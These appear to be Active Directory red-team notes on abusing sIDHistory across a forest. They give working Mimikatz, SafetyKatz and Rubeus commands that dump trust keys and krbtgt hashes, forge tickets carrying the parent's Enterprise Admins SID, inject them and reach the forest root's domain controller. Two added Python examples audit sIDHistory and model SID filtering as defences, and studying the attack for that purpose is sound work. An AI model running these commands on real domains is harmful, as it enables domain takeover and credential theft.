1. Request TGT
2. Receive TGT
3. Show TGT, request TGS for a service outside the domain
4. Receive inter-realm TGT, encrypted with the trust key
5. Request TGS (presenting the inter-realm TGT)
6. Receive TGS
7. Present TGS for access
8. Optional mutual authentication

We need the trust key to forge the inter-realm TGT presented in step 5, and we need to modify sIDHistory to gain higher privileges.
- sIDHistory is a user attribute designed for scenarios where a user is migrated from one domain to another. When a user's domain changes, the user gets a new SID and the old SID is added to sIDHistory.
- sIDHistory can be abused in two ways to escalate privileges within a forest:
  - using the krbtgt hash of the child domain
  - using trust tickets
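Because both techniques rely on a privileged SID (the parent's Enterprise Admins, RID 519) appearing in sIDHistory, the defender's counterpart is to audit that attribute. The following is an added Python example, not code from the original notes: it checks an export of objects (the `sam`, `objectSid` and `sIDHistory` fields and the allowlist of migration source domains are assumptions for the sake of the example; the SIDs are constructed) and flags entries that carry a privileged RID or come from a domain that is not a known migration source.

```python
import re
from dataclasses import dataclass

# Well-known RIDs that should never appear in sIDHistory unless someone put
# them there: 512 Domain Admins, 518 Schema Admins, 519 Enterprise Admins.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}

# Domain SIDs have the form S-1-5-21-<a>-<b>-<c>-<RID>.
SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid):
    """Return (domain SID, RID) for a domain SID, or None for anything else."""
    m = SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else None


@dataclass
class Finding:
    sam: str      # sAMAccountName of the object
    sid: str      # the offending sIDHistory entry
    reason: str


def audit_sid_history(objects, migration_sources):
    """Flag suspicious sIDHistory entries.

    objects: dicts with 'sam', 'objectSid' and 'sIDHistory' (list of SID
             strings), e.g. an export of Get-ADObject -Properties sIDHistory.
    migration_sources: domain SIDs from which sIDHistory is expected after a
             genuine migration (hypothetical allowlist kept by the admins).
    """
    findings = []
    for obj in objects:
        for entry in obj.get("sIDHistory", []):
            parts = split_sid(entry)
            if parts is None:
                findings.append(Finding(obj["sam"], entry, "not a domain SID"))
                continue
            domain, rid = parts
            if rid in PRIVILEGED_RIDS:
                findings.append(Finding(obj["sam"], entry,
                                        f"privileged RID {rid} ({PRIVILEGED_RIDS[rid]})"))
            elif domain not in migration_sources:
                findings.append(Finding(obj["sam"], entry,
                                        "source domain is not a known migration source"))
    return findings


# Constructed sample data (not real SIDs).
PARENT_SID = "S-1-5-21-1111111111-2222222222-3333333333"      # forest root
CHILD_SID = "S-1-5-21-4444444444-5555555555-6666666666"       # current domain
OLD_FOREST_SID = "S-1-5-21-7777777777-8888888888-9999999999"  # decommissioned source

SAMPLE_OBJECTS = [
    {"sam": "migrated.user", "objectSid": CHILD_SID + "-1105",
     "sIDHistory": [OLD_FOREST_SID + "-1105"]},          # legitimate migration
    {"sam": "normal.user", "objectSid": CHILD_SID + "-1106", "sIDHistory": []},
    {"sam": "svc-backup", "objectSid": CHILD_SID + "-1107",
     "sIDHistory": [PARENT_SID + "-519"]},               # Enterprise Admins injected
    {"sam": "contractor", "objectSid": CHILD_SID + "-1108",
     "sIDHistory": [CHILD_SID + "-1200"]},               # own-domain SID, no migration
]


def run_sample():
    return audit_sid_history(SAMPLE_OBJECTS, {OLD_FOREST_SID})


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.sam}: {f.sid} -> {f.reason}")
```

Run against the sample it reports `svc-backup` (parent RID 519 in sIDHistory) and `contractor` (an entry from a domain no migration ever came from); the genuinely migrated user produces nothing. Feeding it a real export only requires producing the same three fields per object.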
Using Trust Key
Retrieve the trust key with any of the following:

```
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\other-forest-account$"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

Forge the inter-realm TGT (trust ticket):

```
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:current.domain.name /sid:see_bloodhound /sids:see_bloodhound /rc4:ntlm_hash /service:krbtgt /target:domain.name /ticket:path_to_ticket.kirbi" "exit"
```

| Options | Description |
|---|---|
| kerberos::golden | Module name |
| /domain:current_domain.name | FQDN of the current domain |
| /sid:S-1-xxxxx | SID of the current domain |
| /sids:domainsid,objectid | SID of the enterprise admins group of the parent domain |
| /rc4:ntlm_hash | RC4 of the trust key |
| /user:Administrator | User to impersonate |
| /service:krbtgt | Target service in the parent domain |
| /target:domain.name | FQDN of the parent domain |
| /ticket:path_to_ticket.kirbi | Path where ticket is to be saved |
Using the trust ticket, we can request a TGS:

```
.\asktgs.exe C:\AD\Tools\trust_tkt.kirbi CIFS/other-forest-dc-fqdn
.\Rubeus.exe asktgs /ticket:path_to_tgtticket.kirbi /service:http/forest-dc.domain.name /dc:domain-controller-fqdn /ptt
```

Now access the DC of the other forest. Tickets for HOST and RPCSS (WMI) and HTTP (PowerShell Remoting and WinRM) can be created in the same way.

The ticket saved by asktgs.exe has to be injected first:

```
.\kirbikator.exe lsa .\CIFS.other-forest-dc-fqdn.kirbi
```

Now access the DC of the other forest.
The same trust ticket can be forged with Rubeus:

```
C:\AD\Tools\Rubeus.exe silver /service:krbtgt/current-domain-name /rc4:trust_key_ntlm /sid:current_domain /sids:S-1-XXXXX-519 /ldap /user:Administrator /nowrap
```

| Options | Description |
|---|---|
| silver | Name of the module |
| /rc4:ntlm | NTLM hash of the trust key |
| /sid:domainsid | SID of the current domain |
| /sids:S-1-XXXXX-519 | SID of the Enterprise Admins group of the parent domain |
| /ldap | Retrieve PAC information from the current domain DC |
| /user:Administrator | Username for which the TGT is generated |
| /nowrap | No newlines in the output |
Request a TGS with the forged ticket:

```
C:\AD\Tools\Rubeus.exe asktgs /service:servicename/other-forest-dc-fqdn /dc:other-forest-dc-fqdn /ptt /ticket:path_to_forged_ticket.kirbi
```

Using krbtgt hash
Dump the krbtgt hash of the current (child) domain:

```
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

Forge a golden ticket with the parent's Enterprise Admins SID in sIDHistory and inject it, or inject a previously saved ticket:

```
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:current.domain.name /sid:current-domain-SID /sids:set SID history to enterprise admins /krbtgt:ntlm_hash /ptt" "exit"
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
```

Now access the DC of the forest root:

```
ls \\forest-dc.fqdn\C$
gwmi -class win32_operatingsystem -ComputerName forest-dc-fqdn
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:forest-name\krbtgt /domain:forest.name" "exit"
```
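Both the trust-ticket and the krbtgt variants above work because the `/sids:` value (the parent's `...-519`) survives the hop from the child to the parent: parent-child trusts inside a forest do not apply SID filtering by default. The following is an added Python example, not code from the original notes, that models what the trusting DC keeps from an inter-realm ticket with and without SID filter quarantining (`netdom trust <trusting> /domain:<trusted> /quarantine:yes`). The SIDs are constructed, the rule that only SIDs relative to the trusted domain survive quarantining is the documented behaviour, and keeping well-known non-domain SIDs unchanged is a simplification of the real filter.

```python
import re

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")
ENTERPRISE_ADMINS_RID = 519


def sid_domain(sid):
    """Domain part of a domain SID, or None for well-known SIDs such as S-1-5-11."""
    m = SID_RE.match(sid)
    return m.group(1) if m else None


def filter_inbound_sids(ticket_sids, trusted_domain_sid, quarantine):
    """Model what the trusting DC keeps from the SIDs in an inter-realm ticket.

    ticket_sids: user SID, group SIDs and the ExtraSids filled from sIDHistory
                 (the values passed as /sids: in the notes above).
    trusted_domain_sid: domain SID of the domain that issued the ticket.
    quarantine=False: default parent-child trust inside a forest; nothing is
                 filtered, so a foreign -519 SID is honoured.
    quarantine=True: SID filtering; any domain SID not relative to the trusted
                 domain is dropped. Well-known non-domain SIDs are kept
                 (simplification of the real filter).
    Returns (kept, dropped).
    """
    if not quarantine:
        return list(ticket_sids), []
    kept, dropped = [], []
    for sid in ticket_sids:
        domain = sid_domain(sid)
        if domain is None or domain == trusted_domain_sid:
            kept.append(sid)
        else:
            dropped.append(sid)
    return kept, dropped


def grants_enterprise_admin(kept_sids, forest_root_sid):
    """True if the surviving SIDs include Enterprise Admins of the forest root."""
    return f"{forest_root_sid}-{ENTERPRISE_ADMINS_RID}" in kept_sids


# Constructed sample (not real SIDs).
PARENT_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # forest root / target
CHILD_SID = "S-1-5-21-4444444444-5555555555-6666666666"    # current domain

# SIDs a forged inter-realm ticket from the child would carry.
FORGED_TICKET_SIDS = [
    CHILD_SID + "-500",      # Administrator of the child
    CHILD_SID + "-513",      # Domain Users of the child
    "S-1-5-11",              # Authenticated Users (well-known)
    PARENT_SID + "-519",     # Enterprise Admins of the parent via sIDHistory
]


def evaluate(quarantine):
    """Return (does the ticket yield Enterprise Admin?, SIDs the filter removed)."""
    kept, dropped = filter_inbound_sids(FORGED_TICKET_SIDS, CHILD_SID, quarantine)
    return grants_enterprise_admin(kept, PARENT_SID), dropped


if __name__ == "__main__":
    for q in (False, True):
        ea, dropped = evaluate(q)
        print(f"quarantine={q}: enterprise admin={ea}, dropped={dropped}")
```

With `quarantine=False` the forged ticket yields Enterprise Admin on the parent; with `quarantine=True` the only SID dropped is the parent's `-519`, and the ticket is reduced to the child's own identities. Enabling quarantining on an intra-forest trust also breaks legitimate sIDHistory use, which is why the first example (auditing sIDHistory) matters even where filtering cannot be switched on.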